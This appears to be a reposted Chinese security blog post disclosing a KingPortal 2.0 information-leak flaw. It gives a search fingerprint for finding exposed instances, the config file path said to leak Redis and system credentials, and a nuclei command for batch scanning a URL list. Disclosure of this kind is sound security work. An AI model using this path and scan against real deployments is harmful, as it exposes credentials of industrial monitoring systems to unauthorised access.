KingPortal开发系统 信息泄露(Redis地址及密码、系统用户名及密码)

admin 2024年10月7日13:15:37评论22 views字数 768阅读2分33秒阅读模式

使用说明:本文章仅用于学习技术研究,请勿用于违法用途,造成任何后果自负与本人无关,请自觉遵守国家法律法规。

一、漏洞简介

北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。 KingPortal开发系统存在敏感信息泄露漏洞,攻击者可以通过漏洞访问接口获取系统账号密码、Redis地址及密码等敏感信息,从而影响系统正常运行。

2、影响版本

KingPortal_2.0

KingPortal开发系统 信息泄露(Redis地址及密码、系统用户名及密码)

3、资产测绘

body="/public/javascripts/Common/Util/km_util.js"

4、漏洞复现

请求接口获取Redis地址及密码、系统用户名及密码

/config/externalConfig.json

KingPortal开发系统 信息泄露(Redis地址及密码、系统用户名及密码)

 nuclei批量脚本放在文章最后

 nuclei.exe -t "C:UsersAdministratorDesktopKingPortal-leaks-ConfigManager.yaml" -l url.txt

nuclei脚本:微信公众号回复“nuclei-KingPortal-config

记得点赞+关注,关注微信公众号菜鸟学渗透或者www.cnxst.vip,获取最新文章,有任何问题可以后台私信我

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

原文始发于微信公众号(菜鸟学渗透):KingPortal开发系统 信息泄露(Redis地址及密码、系统用户名及密码)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日13:15:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   KingPortal开发系统 信息泄露(Redis地址及密码、系统用户名及密码)http://cn-sec.com/archives/3237174.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息